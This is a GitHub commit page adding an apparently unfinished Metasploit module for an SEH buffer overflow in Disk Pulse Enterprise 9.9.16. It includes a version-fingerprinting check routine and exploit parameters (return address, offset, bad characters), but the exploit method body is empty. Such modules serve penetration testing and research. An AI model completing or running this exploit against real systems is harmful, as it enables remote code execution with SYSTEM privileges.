Skip to content

Commit eb0d174

Browse files
committed
Add disk_pulse_enterprise_get module
1 parent 5f66b7e commit eb0d174

File tree

1 file changed

+77
-0
lines changed

1 file changed

+77
-0
lines changed
Lines changed: 77 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Exploit::Remote
9+
Rank = ExcellentRanking
10+
11+
include Msf::Exploit::Remote::HttpClient
12+
include Msf::Exploit::Remote::Egghunter
13+
include Msf::Exploit::Remote::Seh
14+
15+
def initialize(info = {})
16+
super(update_info(info,
17+
'Name' => 'Disk Pulse Enterprise Login Buffer Overflow',
18+
'Description' => %q{
19+
This module exploits an SEH buffer overflow in Disk Pulse Enterprise
20+
9.9.16. If a malicious user sends a malicious HTTP GET request,
21+
it is possible to execute a payload that would run under the Windows
22+
NT AUTHORITY\SYSTEM account.
23+
},
24+
'License' => MSF_LICENSE,
25+
'Author' =>
26+
[
27+
'Chance Johnson', # module - hackback.sh - [email protected]
28+
'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
29+
],
30+
'References' =>
31+
[
32+
[ 'EDB', '42560' ]
33+
],
34+
'DefaultOptions' =>
35+
{
36+
'EXITFUNC' => 'none'
37+
},
38+
'Platform' => 'win',
39+
'Payload' =>
40+
{
41+
'BadChars' => "\x00\x0a\x0d\x26"
42+
},
43+
'Targets' =>
44+
[
45+
[ 'Disk Pulse Enterprise 9.9.16',
46+
{
47+
'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
48+
'Offset' => 12600
49+
}
50+
],
51+
],
52+
'Privileged' => true,
53+
'DisclosureDate' => 'Oct 03 2016',
54+
'DefaultTarget' => 0))
55+
56+
register_options([Opt::RPORT(80)], self.class)
57+
58+
end
59+
60+
def check
61+
res = send_request_cgi({
62+
'uri' => '/',
63+
'method' => 'GET'
64+
})
65+
66+
if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.9\.16/
67+
return Exploit::CheckCode::Appears
68+
end
69+
70+
return Exploit::CheckCode::Safe
71+
end
72+
73+
def exploit
74+
75+
76+
end
77+
end

0 commit comments

Comments
 (0)